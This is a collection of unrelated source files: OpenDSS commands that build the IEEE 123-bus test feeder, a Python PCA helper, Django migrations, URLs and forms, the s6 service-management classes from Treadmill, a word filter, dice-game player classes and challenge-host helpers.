DSSText.Command = "New Line.L71 Phases=1 Bus1=70.1 Bus2=71.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L72 Phases=1 Bus1=72.3 Bus2=73.3 LineCode=11 Length=0.275 units=kft"
DSSText.Command = "New Line.L73 Phases=3 Bus1=72.1.2.3 Bus2=76.1.2.3 LineCode=3 Length=0.2 units=kft"
DSSText.Command = "New Line.L74 Phases=1 Bus1=73.3 Bus2=74.3 LineCode=11 Length=0.35 units=kft"
DSSText.Command = "New Line.L75 Phases=1 Bus1=74.3 Bus2=75.3 LineCode=11 Length=0.4 units=kft"
DSSText.Command = "New Line.L76 Phases=3 Bus1=76.1.2.3 Bus2=77.1.2.3 LineCode=6 Length=0.4 units=kft"
DSSText.Command = "New Line.L77 Phases=3 Bus1=76.1.2.3 Bus2=86.1.2.3 LineCode=3 Length=0.7 units=kft"
DSSText.Command = "New Line.L78 Phases=3 Bus1=77.1.2.3 Bus2=78.1.2.3 LineCode=6 Length=0.1 units=kft"
DSSText.Command = "New Line.L79 Phases=3 Bus1=78.1.2.3 Bus2=79.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L80 Phases=3 Bus1=78.1.2.3 Bus2=80.1.2.3 LineCode=6 Length=0.475 units=kft"
DSSText.Command = "New Line.L81 Phases=3 Bus1=80.1.2.3 Bus2=81.1.2.3 LineCode=6 Length=0.175 units=kft"
DSSText.Command = "New Line.L82 Phases=3 Bus1=81.1.2.3 Bus2=82.1.2.3 LineCode=6 Length=0.25 units=kft"
DSSText.Command = "New Line.L83 Phases=1 Bus1=81.3 Bus2=84.3 LineCode=11 Length=0.675 units=kft"
DSSText.Command = "New Line.L84 Phases=3 Bus1=82.1.2.3 Bus2=83.1.2.3 LineCode=6 Length=0.25 units=kft"
DSSText.Command = "New Line.L85 Phases=1 Bus1=84.3 Bus2=85.3 LineCode=11 Length=0.475 units=kft"
DSSText.Command = "New Line.L86 Phases=3 Bus1=86.1.2.3 Bus2=87.1.2.3 LineCode=6 Length=0.45 units=kft"
DSSText.Command = "New Line.L87 Phases=1 Bus1=87.1 Bus2=88.1 LineCode=9 Length=0.175 units=kft"
DSSText.Command = "New Line.L88 Phases=3 Bus1=87.1.2.3 Bus2=89.1.2.3 LineCode=6 Length=0.275 units=kft"
DSSText.Command = "New Line.L89 Phases=1 Bus1=89.2 Bus2=90.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L90 Phases=3 Bus1=89.1.2.3 Bus2=91.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L91 Phases=1 Bus1=91.3 Bus2=92.3 LineCode=11 Length=0.3 units=kft"
DSSText.Command = "New Line.L92 Phases=3 Bus1=91.1.2.3 Bus2=93.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L93 Phases=1 Bus1=93.1 Bus2=94.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L94 Phases=3 Bus1=93.1.2.3 Bus2=95.1.2.3 LineCode=6 Length=0.3 units=kft"
DSSText.Command = "New Line.L95 Phases=1 Bus1=95.2 Bus2=96.2 LineCode=10 Length=0.2 units=kft"
DSSText.Command = "New Line.L96 Phases=3 Bus1=97.1.2.3 Bus2=98.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L97 Phases=3 Bus1=98.1.2.3 Bus2=99.1.2.3 LineCode=3 Length=0.55 units=kft"
DSSText.Command = "New Line.L98 Phases=3 Bus1=99.1.2.3 Bus2=100.1.2.3 LineCode=3 Length=0.3 units=kft"
DSSText.Command = "New Line.L99 Phases=3 Bus1=100.1.2.3 Bus2=450.1.2.3 LineCode=3 Length=0.8 units=kft"
DSSText.Command = "New Line.L118 Phases=3 Bus1=197.1.2.3 Bus2=101.1.2.3 LineCode=3 Length=0.25 units=kft"
DSSText.Command = "New Line.L100 Phases=1 Bus1=101.3 Bus2=102.3 LineCode=11 Length=0.225 units=kft"
DSSText.Command = "New Line.L101 Phases=3 Bus1=101.1.2.3 Bus2=105.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L102 Phases=1 Bus1=102.3 Bus2=103.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L103 Phases=1 Bus1=103.3 Bus2=104.3 LineCode=11 Length=0.7 units=kft"
DSSText.Command = "New Line.L104 Phases=1 Bus1=105.2 Bus2=106.2 LineCode=10 Length=0.225 units=kft"
DSSText.Command = "New Line.L105 Phases=3 Bus1=105.1.2.3 Bus2=108.1.2.3 LineCode=3 Length=0.325 units=kft"
DSSText.Command = "New Line.L106 Phases=1 Bus1=106.2 Bus2=107.2 LineCode=10 Length=0.575 units=kft"
DSSText.Command = "New Line.L107 Phases=1 Bus1=108.1 Bus2=109.1 LineCode=9 Length=0.45 units=kft"
DSSText.Command = "New Line.L108 Phases=3 Bus1=108.1.2.3 Bus2=300.1.2.3 LineCode=3 Length=1 units=kft"
DSSText.Command = "New Line.L109 Phases=1 Bus1=109.1 Bus2=110.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L110 Phases=1 Bus1=110.1 Bus2=111.1 LineCode=9 Length=0.575 units=kft"
DSSText.Command = "New Line.L111 Phases=1 Bus1=110.1 Bus2=112.1 LineCode=9 Length=0.125 units=kft"
DSSText.Command = "New Line.L112 Phases=1 Bus1=112.1 Bus2=113.1 LineCode=9 Length=0.525 units=kft"
DSSText.Command = "New Line.L113 Phases=1 Bus1=113.1 Bus2=114.1 LineCode=9 Length=0.325 units=kft"
DSSText.Command = "New Line.L114 Phases=3 Bus1=135.1.2.3 Bus2=35.1.2.3 LineCode=4 Length=0.375 units=kft"
DSSText.Command = "New Line.L116 Phases=3 Bus1=152.1.2.3 Bus2=52.1.2.3 LineCode=1 Length=0.4 units=kft"
DSSText.Command = "New Line.L117 Phases=3 Bus1=160r.1.2.3 Bus2=67.1.2.3 LineCode=6 Length=0.35 units=kft"
#
#
# ! NORMALLY CLOSED SWITCHES ARE DEFINED AS SHORT LINES
# ! Could also be defined by setting the Switch=Yes property
#
DSSText.Command = "New Line.Sw2 phases=3 Bus1=13 Bus2=152 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw1 phases=3 Bus1=150r Bus2=149 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw3 phases=3 Bus1=18 Bus2=135 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw4 phases=3 Bus1=60 Bus2=160 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw5 phases=3 Bus1=97 Bus2=197 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw6 phases=3 Bus1=61 Bus2=61s r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
#
# ! NORMALLY OPEN SWITCHES; DEFINED AS SHORT LINE TO OPEN BUS SO WE CAN SEE OPEN POINT VOLTAGES.
# ! COULD ALSO BE DEFINED AS DISABLED OR THE TERMINAL COULD BE OPENED AFTER BEING DEFINED
#
DSSText.Command = "New Line.Sw7 phases=3 Bus1=151 Bus2=300_OPEN r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw8 phases=1 Bus1=54.1 Bus2=94_OPEN.1 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
#
# ! LOAD TRANSFORMER AT 61s/610
# ! This is a 150 kVA Delta-Delta stepdown from 4160V to 480V.
#
DSSText.Command = "New Transformer.XFM1 Phases=3 Windings=2 Xhl=2.72"
DSSText.Command = "~ wdg=1 bus=61s conn=Delta kv=4.16 kva=150 %r=0.635"
DSSText.Command = "~ wdg=2 bus=610 conn=Delta kv=0.48 kva=150 %r=0.635"
#
# ! CAPACITORS
# ! Capacitors are 2-terminal devices. The 2nd terminal (Bus2=...) defaults to all phases
# ! connected to ground (Node 0). Thus, it need not be specified if a Y-connected or L-N connected
# ! capacitor is desired
#
DSSText.Command = "New Capacitor.C83 Bus1=83 Phases=3 kVAR=600 kV=4.16"
DSSText.Command = "New Capacitor.C88a Bus1=88.1 Phases=1 kVAR=50 kV=2.402"
DSSText.Command = "New Capacitor.C90b Bus1=90.2 Phases=1 kVAR=50 kV=2.402"
DSSText.Command = "New Capacitor.C92c Bus1=92.3 Phases=1 kVAR=50 kV=2.402"
#
#
# !REGULATORS - REDIRECT TO DEFINITIONS FILE
# ! This file contains definitions for the remainder of regulators on the feeder:
#
DSSText.Command = "Redirect IEEE123Regulators.DSS"
#
# ! SPOT LOADS -- REDIRECT INPUT STREAM TO LOAD DEFINITIONS FILE
#
DSSText.Command = "Redirect IEEE123Loads.DSS"
#
# ! All devices in the test feeder are now defined.
# !
# ! Many of the voltages are reported in per unit, so it is important to establish the base voltages at each bus so
# ! that we can compare with the result with greater ease.
# ! We will let the DSS compute the voltage bases by doing a zero-load power flow.
# ! There are only two voltage bases in the problem: 4160V and 480V. These must be expressed in kV
#
DSSText.Command = "Set VoltageBases = [4.16, 0.48] ! ARRAY OF VOLTAGES IN KV"
DSSText.Command = "CalcVoltageBases ! PERFORMS ZERO LOAD POWER FLOW TO ESTIMATE VOLTAGE BASES"
DSSText.Command = "solve"
DSSText.Command = "Show Voltage LN Nodes"
|
import numpy as np
class pca:
    """Principal Component Analysis helpers over a list of equal-length
    1-D numpy vectors.  (Python 2 syntax: bare ``print`` statements.)"""
    def __init__(self):
        print ''
    def meanVector(self,vectorLijst):
        # Element-wise mean of the vectors, accumulated by summation.
        result = np.zeros(vectorLijst[0].size)
        i=0
        for vector in vectorLijst:
            result = result + vector
            i += 1
        result = result/i
        return result
    def covarianceMatrix(self,vectorLijst):
        # Sample covariance S = D.D^T / n, where column i of D is
        # (vector_i - mean).  Note: divides by n, not n-1.
        mean = self.meanVector(vectorLijst)
        a = len(vectorLijst[0])
        b = len(vectorLijst)
        D = np.zeros(shape=(a,b))
        i=0
        for vector in vectorLijst:
            D[:,i] = vector-mean
            i += 1
        S = D.dot(np.transpose(D))/i
        return S
    def covarianceMatrix2(self, vectorLijst):
        # Alternative that delegates to numpy.cov.
        # NOTE(review): np.cov normalizes by (n-1) by default while
        # covarianceMatrix divides by n -- the two are not interchangeable;
        # confirm which convention callers expect.
        X = np.zeros(shape=(vectorLijst[0].size,len(vectorLijst)))
        for i in range (0,len(vectorLijst)):
            X[:,i] = vectorLijst[i]
        S = np.cov(X)
        return S
    def eigenDecomposition(self,vectorLijst):
        # Eigenvalues/eigenvectors of the sample covariance matrix.
        S = self.covarianceMatrix(vectorLijst)
        Eval, Evec = np.linalg.eig(S)
        return Eval, Evec
    def pca(self,f,vectorLijst):
        """Keep the leading eigenvectors whose eigenvalues account for a
        fraction ``f`` of the total variance; returns (P, kept eigenvalues)."""
        eigenwaarden,eigenvectoren = self.eigenDecomposition(vectorLijst)
        # Sort eigenpairs by descending absolute eigenvalue.
        positiveEigenvalues = np.absolute(eigenwaarden)
        idx = (-np.array(positiveEigenvalues)).argsort()
        eigenValues = positiveEigenvalues[idx]
        eigenvectoren = eigenvectoren[:,idx]
        evecT = np.transpose(eigenvectoren)
        Vt = np.sum(eigenValues)
        PT = np.array(evecT[0])
        # Build the eigenvector matrix by appending one row at a time.
        Sum = eigenValues[0]
        t = 1
        #print 'Vt = ' +str(Vt)
        while Sum < f*Vt:
            Sum = Sum + eigenValues[t]
            if Sum < f*Vt:
                t += 1
            # NOTE(review): evecT[t] is appended even on the final pass where
            # t is not incremented, so P may hold one more column than the
            # number of eigenvalues returned in eigenValues[0:t] -- confirm
            # this asymmetry is intended.
            PT = np.vstack([PT, evecT[t]])
        P = np.transpose(PT)
        return P, eigenValues[0:t]
|
# Generated by Django 2.2.7 on 2020-01-26 09:20
from django.db import migrations
class Migration(migrations.Migration):
    """Empty merge migration: reconciles the two parallel migration branches
    listed in ``dependencies``; performs no schema changes itself."""
    dependencies = [
        ('statics', '0020_auto_20200126_1444'),
        ('statics', '0022_reply_deleted'),
    ]
    # Intentionally empty -- this migration only merges history.
    operations = [
    ]
|
"""s6 services management.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import errno
import os
import logging
import six
from treadmill import fs
from .. import _utils
from .. import _service_base
_LOGGER = logging.getLogger(__name__)
class BundleService(_service_base.Service):
    """s6 rc bundle service.

    A bundle is a named set of other services; its only payload is the
    ``contents`` file listing the services it groups.
    """
    __slots__ = (
        '_contents',
    )
    _TYPE = _service_base.ServiceType.Bundle

    def __init__(self, directory, name, contents=None):
        super(BundleService, self).__init__(directory, name)
        # Lazily loaded from the `contents` file when not provided.
        self._contents = contents

    @property
    def type(self):
        return self._TYPE

    @property
    def _contents_file(self):
        return os.path.join(self._dir, 'contents')

    @property
    def contents(self):
        """Gets the contents of the bundle.
        """
        # Lazy read: only touch the filesystem on first access.
        if self._contents is None:
            self._contents = _utils.set_list_read(self._contents_file)
        return self._contents

    def write(self):
        """Write down the service definition.

        :raises ``ValueError``:
            If the bundle has no contents (either in memory or on disk).
        """
        super(BundleService, self).write()
        # Mandatory settings: a bundle without contents is invalid.
        if not self._contents and not os.path.exists(self._contents_file):
            raise ValueError('Invalid Bundle: No content')
        elif self._contents is not None:
            if not self._contents:
                raise ValueError('Invalid Bundle: empty')
            _utils.set_list_write(self._contents_file, self._contents)
@six.add_metaclass(abc.ABCMeta)
class _AtomicService(_service_base.Service):
    """Abstract base class for all atomic services (per s6-rc definition).

    Holds the state shared by long-running and one-shot services:
    dependencies, environment, and up/down timeouts.  All attributes are
    lazily read from the service directory and only written back when
    they were explicitly set.
    """
    __slots__ = (
        '_dependencies',
        '_timeout_up',
        '_timeout_down',
        '_env',
    )

    def __init__(self, directory, name,
                 timeout_up=None, timeout_down=None,
                 dependencies=None, environ=None):
        super(_AtomicService, self).__init__(directory, name)
        self._dependencies = dependencies
        self._timeout_up = timeout_up
        self._timeout_down = timeout_down
        self._env = environ

    @property
    def data_dir(self):
        """Returns the data directory for the services.

        :returns ``str``:
            Full path to the service data directory.
        """
        return os.path.join(self._dir, 'data')

    @property
    def env_dir(self):
        """Returns the environ directory for the services.

        :returns ``str``:
            Full path to the service environ directory.
        """
        return os.path.join(self._dir, 'env')

    @property
    def environ(self):
        """Returns the environ dictionary for the services.

        :returns ``dict``:
            Service environ dictionary.
        """
        # Lazy read from the env directory on first access.
        if self._env is None:
            self._env = _utils.environ_dir_read(self.env_dir)
        return self._env

    @environ.setter
    def environ(self, new_environ):
        self._env = new_environ

    @property
    def _dependencies_file(self):
        return os.path.join(self._dir, 'dependencies')

    @property
    def dependencies(self):
        """Returns the dependencies set for the services.

        :returns ``set``:
            Service dependencies set.
        """
        if self._dependencies is None:
            self._dependencies = _utils.set_list_read(self._dependencies_file)
        return self._dependencies

    @dependencies.setter
    def dependencies(self, new_deps):
        self._dependencies = set(new_deps)

    @property
    def timeout_up(self):
        """Returns amount of milliseconds to wait for the service to come up.

        :returns ``int``:
            Amount of milliseconds to wait. 0 means infinitely.
        """
        if self._timeout_up is None:
            self._timeout_up = _utils.value_read(
                os.path.join(self._dir, 'timeout-up'),
                default=0
            )
        return self._timeout_up

    @property
    def timeout_down(self):
        """Returns amount of milliseconds to wait for the service to come down.

        :returns ``int``:
            Amount of milliseconds to wait. 0 means infinitely.
        """
        if self._timeout_down is None:
            self._timeout_down = _utils.value_read(
                os.path.join(self._dir, 'timeout-down'),
                default=0
            )
        return self._timeout_down

    @abc.abstractmethod
    def write(self):
        """Write down the service definition.

        Creates the env/data directories and persists only the attributes
        that were explicitly set (lazily-read values are not re-written).
        """
        super(_AtomicService, self).write()
        # We only write dependencies/environ if we have new ones.
        fs.mkdir_safe(self.env_dir)
        fs.mkdir_safe(self.data_dir)
        if self._dependencies is not None:
            _utils.set_list_write(self._dependencies_file, self._dependencies)
        if self._env is not None:
            _utils.environ_dir_write(self.env_dir, self._env)
        if self._timeout_up is not None:
            _utils.value_write(
                os.path.join(self._dir, 'timeout-up'),
                self._timeout_up
            )
        if self._timeout_down is not None:
            _utils.value_write(
                os.path.join(self._dir, 'timeout-down'),
                self._timeout_down
            )
class LongrunService(_AtomicService):
    """s6 long running service.

    Wraps a supervised s6 service directory: run/finish scripts, optional
    logger, readiness notification fd and pipeline (producer/consumer)
    wiring.  All attributes are lazily read from disk and only persisted
    by :meth:`write` when explicitly set.
    """
    __slots__ = (
        '_consumer_for',
        '_default_down',
        '_finish_script',
        '_log_run_script',
        '_notification_fd',
        '_pipeline_name',
        '_producer_for',
        '_run_script',
        '_timeout_finish',
    )

    _TYPE = _service_base.ServiceType.LongRun

    def __init__(self, directory, name,
                 run_script=None, finish_script=None, notification_fd=None,
                 log_run_script=None, timeout_finish=None, default_down=None,
                 pipeline_name=None, producer_for=None, consumer_for=None,
                 dependencies=None, environ=None):
        super(LongrunService, self).__init__(
            directory,
            name,
            dependencies=dependencies,
            environ=environ
        )
        # A service cannot both feed a pipeline consumer and have its own
        # dedicated logger.
        if producer_for and log_run_script:
            raise ValueError('Invalid LongRun service options: producer/log')
        self._consumer_for = consumer_for
        self._default_down = default_down
        self._finish_script = finish_script
        self._log_run_script = log_run_script
        self._notification_fd = notification_fd
        self._pipeline_name = pipeline_name
        self._producer_for = producer_for
        self._run_script = run_script
        self._timeout_finish = timeout_finish

    @property
    def type(self):
        return self._TYPE

    @property
    def logger_dir(self):
        """Returns the logger directory for the services.

        :returns ``str``:
            Full path to the service log directory.
        """
        return os.path.join(self._dir, 'log')

    @property
    def notification_fd(self):
        """s6 "really up" notification fd.
        """
        if self._notification_fd is None:
            self._notification_fd = _utils.value_read(
                os.path.join(self._dir, 'notification-fd'),
                default=-1
            )
        return self._notification_fd

    @notification_fd.setter
    def notification_fd(self, new_notification_fd):
        self._notification_fd = new_notification_fd

    @property
    def default_down(self):
        """Is the default service state set to down?
        """
        # Presence of the `down` file means the supervisor should not
        # start the service automatically.
        if self._default_down is None:
            self._default_down = os.path.exists(
                os.path.join(self._dir, 'down')
            )
        return self._default_down

    @default_down.setter
    def default_down(self, default_down):
        self._default_down = bool(default_down)

    @property
    def _run_file(self):
        return os.path.join(self._dir, 'run')

    @property
    def _finish_file(self):
        return os.path.join(self._dir, 'finish')

    @property
    def _log_run_file(self):
        return os.path.join(self.logger_dir, 'run')

    @property
    def run_script(self):
        """Service run script.
        """
        if self._run_script is None:
            self._run_script = _utils.script_read(self._run_file)
        return self._run_script

    @run_script.setter
    def run_script(self, new_script):
        self._run_script = new_script

    @property
    def finish_script(self):
        """Service finish script.

        Returns ``None`` when no finish script exists on disk.
        """
        if self._finish_script is None:
            try:
                self._finish_script = _utils.script_read(self._finish_file)
            except IOError as err:
                # BUGFIX: compare errno with `!=`, not `is not`; identity
                # comparison of ints is a CPython small-int accident.
                if err.errno != errno.ENOENT:
                    raise
        return self._finish_script

    @finish_script.setter
    def finish_script(self, new_script):
        self._finish_script = new_script

    @property
    def log_run_script(self):
        """Service log run script.

        Returns ``None`` when the service has no logger.
        """
        if self._log_run_script is None:
            try:
                self._log_run_script = _utils.script_read(self._log_run_file)
            except IOError as err:
                # BUGFIX: `!=` instead of `is not` (see finish_script).
                if err.errno != errno.ENOENT:
                    raise
        return self._log_run_script

    @log_run_script.setter
    def log_run_script(self, new_script):
        self._log_run_script = new_script

    @property
    def timeout_finish(self):
        """Returns amount of milliseconds to wait for the finish script to
        complete.

        :returns ``int``:
            Amount of milliseconds to wait. 0 means infinitely. Default 5000.
        """
        if self._timeout_finish is None:
            self._timeout_finish = _utils.value_read(
                os.path.join(self._dir, 'timeout-finish'),
                default=5000
            )
        return self._timeout_finish

    @timeout_finish.setter
    def timeout_finish(self, timeout_finish):
        """Service finish script timeout.
        """
        if timeout_finish is not None:
            if isinstance(timeout_finish, six.integer_types):
                self._timeout_finish = timeout_finish
            else:
                self._timeout_finish = int(timeout_finish, 10)

    @property
    def _pipeline_name_file(self):
        return os.path.join(self._dir, 'pipeline-name')

    @property
    def pipeline_name(self):
        """Gets the name of the pipeline.
        """
        if self._pipeline_name is None:
            self._pipeline_name = _utils.data_read(self._pipeline_name_file)
        return self._pipeline_name

    @pipeline_name.setter
    def pipeline_name(self, new_name):
        self._pipeline_name = new_name

    @property
    def _producer_for_file(self):
        return os.path.join(self._dir, 'producer-for')

    @property
    def producer_for(self):
        """Gets which services this service is a producer for.
        """
        if self._producer_for is None:
            self._producer_for = _utils.data_read(self._producer_for_file)
        return self._producer_for

    @producer_for.setter
    def producer_for(self, new_name):
        """Sets the producer for another service.
        """
        self._producer_for = new_name

    @property
    def _consumer_for_file(self):
        return os.path.join(self._dir, 'consumer-for')

    @property
    def consumer_for(self):
        """Gets which services this service is a consumer for.
        """
        if self._consumer_for is None:
            self._consumer_for = _utils.data_read(self._consumer_for_file)
        return self._consumer_for

    @consumer_for.setter
    def consumer_for(self, new_name):
        """Sets which services this service is a consumer for.
        """
        self._consumer_for = new_name

    def write(self):
        """Write down the service definition.

        Persists only attributes that were explicitly set; a run script is
        mandatory (in memory or already on disk).

        :raises ``ValueError``:
            If the service has no run script.
        """
        # Disable R0912: Too many branches
        # pylint: disable=R0912
        super(LongrunService, self).write()
        # Mandatory settings
        if self._run_script is None and not os.path.exists(self._run_file):
            raise ValueError('Invalid LongRun service: not run script')
        elif self._run_script is not None:
            _utils.script_write(self._run_file, self._run_script)
            # Handle the case where the run script is a generator: it can
            # only be consumed once, so drop the cached value.
            if not isinstance(self._run_script, six.string_types):
                self._run_script = None
        # Optional settings
        if self._finish_script is not None:
            _utils.script_write(self._finish_file, self._finish_script)
            # Handle the case where the finish script is a generator
            if not isinstance(self._finish_script, six.string_types):
                self._finish_script = None
        if self._log_run_script is not None:
            # Create the log dir on the spot
            fs.mkdir_safe(os.path.dirname(self._log_run_file))
            _utils.script_write(self._log_run_file, self._log_run_script)
            # Handle the case where the run script is a generator
            if not isinstance(self._log_run_script, six.string_types):
                self._log_run_script = None
        if self._default_down:
            _utils.data_write(
                os.path.join(self._dir, 'down'),
                None
            )
        else:
            fs.rm_safe(os.path.join(self._dir, 'down'))
        if self._timeout_finish is not None:
            _utils.value_write(
                os.path.join(self._dir, 'timeout-finish'),
                self._timeout_finish
            )
        if self._notification_fd is not None:
            _utils.value_write(
                os.path.join(self._dir, 'notification-fd'),
                self._notification_fd
            )
        if self._pipeline_name is not None:
            _utils.data_write(self._pipeline_name_file, self._pipeline_name)
        if self._producer_for is not None:
            _utils.data_write(self._producer_for_file, self._producer_for)
        if self._consumer_for is not None:
            _utils.data_write(self._consumer_for_file, self._consumer_for)
class OneshotService(_AtomicService):
    """Represents a s6 rc one-shot service which is only ever executed once.

    Carries an ``up`` script (mandatory) and an optional ``down`` script,
    both lazily read from the service directory.
    """
    __slots__ = (
        '_up',
        '_down',
    )

    # XXX timeout-up/timeout-down
    _TYPE = _service_base.ServiceType.Oneshot

    def __init__(self, directory, name=None,
                 up_script=None, down_script=None,
                 dependencies=None, environ=None):
        super(OneshotService, self).__init__(
            directory,
            name,
            dependencies=dependencies,
            environ=environ
        )
        self._up = up_script
        self._down = down_script

    @property
    def type(self):
        return self._TYPE

    @property
    def _up_file(self):
        return os.path.join(self._dir, 'up')

    @property
    def _down_file(self):
        return os.path.join(self._dir, 'down')

    @property
    def up(self):
        """Gets the one shot service up file.
        """
        if self._up is None:
            self._up = _utils.script_read(self._up_file)
        return self._up

    @up.setter
    def up(self, new_script):
        """Sets the one-shot service up file.
        """
        self._up = new_script

    @property
    def down(self):
        """Gets the one-shot service down file.
        """
        if self._down is None:
            self._down = _utils.script_read(self._down_file)
        return self._down

    @down.setter
    def down(self, new_script):
        """Sets the one-shot service down file.
        """
        self._down = new_script

    def write(self):
        """Write down the service definition.

        :raises ``ValueError``:
            If the service has no up script (in memory or on disk).
        """
        super(OneshotService, self).write()
        # Mandatory settings
        if not self._up and not os.path.exists(self._up_file):
            raise ValueError('Invalid Oneshot service: not up script')
        elif self._up is not None:
            _utils.script_write(self._up_file, self._up)
            # BUGFIX: the original checked/assigned the read-only path
            # property `self._up_file` (always a str) instead of the cached
            # script.  Mirror LongrunService.write: a generator script can
            # only be consumed once, so drop the cached value.
            if not isinstance(self._up, six.string_types):
                self._up = None
        # Optional settings
        if self._down is not None:
            _utils.script_write(self._down_file, self._down)
            # BUGFIX: same as above for the down script.
            if not isinstance(self._down, six.string_types):
                self._down = None
def create_service(svc_basedir, svc_name, svc_type, **kwargs):
    """Factory function instantiating a new service object from parameters.

    :param ``str`` svc_basedir:
        Base directory where to create the service.
    :param ``str`` svc_name:
        Name of the new service.
    :param ``_service_base.ServiceType`` svc_type:
        Type for the new service.
    :param ``dict`` kw_args:
        Additional argument passed to the constructor of the new service.
    :returns ``Service``:
        New instance of the service
    """
    implementations = {
        _service_base.ServiceType.Bundle: BundleService,
        _service_base.ServiceType.LongRun: LongrunService,
        _service_base.ServiceType.Oneshot: OneshotService,
    }
    try:
        impl_class = implementations[svc_type]
    except KeyError:
        # Unknown type: log loudly and fall back to a long-running service.
        _LOGGER.critical('No implementation for service type %r', svc_type)
        impl_class = LongrunService
    return impl_class(svc_basedir, svc_name, **kwargs)


__all__ = (
    'BundleService',
    'LongrunService',
    'OneshotService',
    'create_service',
)
|
from django.conf.urls import url
from . import views
# URL routes for the treasure-hunt app.
# FIX: the regex patterns were written with an `f''` prefix (f-string) where
# a raw string `r''` was clearly intended -- made consistent with the first
# entry.  Also anchored the cluenode/add route with `$` so it no longer
# prefix-matches longer paths.
urlpatterns = [
    url(r'^$', views.index),
    url(r'^treasurehunt$', views.find_Thunt),
    url(r'^treasurehunt/add$', views.create_Thunt),
    url(r'^cluenode/delete$', views.delete_node),
    url(r'^cluenode/add$', views.create_node),
]
|
# read through file one line at a time
def clean_word(word):
    """Normalize one dictionary line: strip surrounding whitespace, lowercase."""
    return word.lower().strip()
def get_vowel_in_word(words):
    """Return the vowels of *words* in order of appearance (duplicates kept)."""
    return ''.join(ch for ch in words if ch in "aeiou")
# main program
def main():
    """Print every dictionary word longer than 6 letters whose vowels,
    in order, are exactly "aeiou"."""
    vowels = "aeiou"
    # FIX: use a context manager so the file handle is always closed
    # (the original opened the file and never closed it).
    with open("dictionary.txt", "r") as file_obj:
        for line in file_obj:
            word = clean_word(line)
            if len(word) <= 6:
                continue
            if get_vowel_in_word(word) == vowels:
                print(word)


if __name__ == "__main__":
    main()
|
from django import forms
class unknownWordForm(forms.Form):
    """Single free-text field for submitting an unknown word."""
    # Empty label so the template renders the input without a caption.
    unknownWord = forms.CharField(label='')
class studentZipcode(forms.Form):
    """Single free-text field for a student's zip code."""
    # Empty label so the template renders the input without a caption.
    zip_code = forms.CharField(label='')
|
class Player:
    """ Base class of a cuatro player """
    def __init__(self, name):
        self.name = name
        # the color is assigned by the Game, when the player is added.
        self.color = None
    def play(self, *args):
        # NOTE(review): subclasses are expected to override this; consider
        # raising NotImplementedError instead of printing.
        print "not implemented"
        return []
    def place(self, *args):
        # NOTE(review): see play() -- subclasses must override.
        print "not implemented"
class Human(Player):
    """ A console-based human player.  (Python 2: `print` / `raw_input`.) """
    def __init__(self, name="Human"):
        Player.__init__(self, name)
    def play(self, dice, board):
        # Show the board and the current throw, then let the user type the
        # digits to keep; non-digit characters are silently ignored.
        print board
        print dice.throws, "\t", dice
        keep = raw_input("which numbers do you want to keep? ")
        return [int(k) for k in keep if k.isdigit()]
    def place(self, dice, board):
        # Prompt until the user enters exactly two characters (a position),
        # normalized to upper case.
        print board
        print dice
        place = ""
        while len(place) != 2:
            place = raw_input("where to place your piece? ").upper()
        return place
class GoForYahtzee(Player):
    """Greedy bot: keeps the most frequent die value and places on the
    highest-weighted fitting field.  (Python 2 syntax.)"""
    # Static desirability of each board field; scaled by stack height when
    # placing.
    weights = {
        "Yahtzee": 200,
        "Full House": 90,
        "Straight": 90,
        "4-of-a-kind": 80,
        "3-of-a-kind": 40,
        "Ones": 5,
        "Twos": 5,
        "Threes": 5,
        "Fours": 5,
        "Fives": 5,
        "Sixes": 5
    }
    def __init__(self, name="GoForYahtzeeBot"):
        Player.__init__(self, name)
    def play(self, dice, board):
        # Keep every die showing the most frequent value.
        maximum = max(dice.counts, key=dice.counts.get)
        max_count = dice.counts[maximum]
        keep = [maximum] * max_count
        print self.name, dice, keep
        return keep
    def place(self, dice, board):
        # score each field ==> take highest
        candidates = []
        for field in board.fields():
            if field.fits(dice):
                # Taller stacks score better: +20% per level of height.
                score = self.weights[field.name] * (1 + field.height * 0.2)
                candidates.append((score, field.position))
        # None when no field fits; otherwise the position of the best score.
        pos = None if len(candidates) == 0 else max(candidates)[1]
        return pos
|
from base.utils import get_model_object
from challenges.models import Challenge
from .models import ChallengeHost, ChallengeHostTeam
def get_challenge_host_teams_for_user(user):
    """Returns challenge host team ids for a particular user"""
    # NOTE(review): values_list('team_name') yields the related-team pk
    # values (used below as creator_id values), not name strings -- confirm
    # against the ChallengeHost model definition.
    return ChallengeHost.objects.filter(user=user).values_list('team_name', flat=True)
def is_user_a_host_of_challenge(user, challenge_pk):
    """Returns boolean if the user is host of a challenge."""
    # A user hosts a challenge when the challenge's creator is one of the
    # host teams the user belongs to.
    challenge_host_teams = get_challenge_host_teams_for_user(user)
    return Challenge.objects.filter(pk=challenge_pk, creator_id__in=challenge_host_teams).exists()
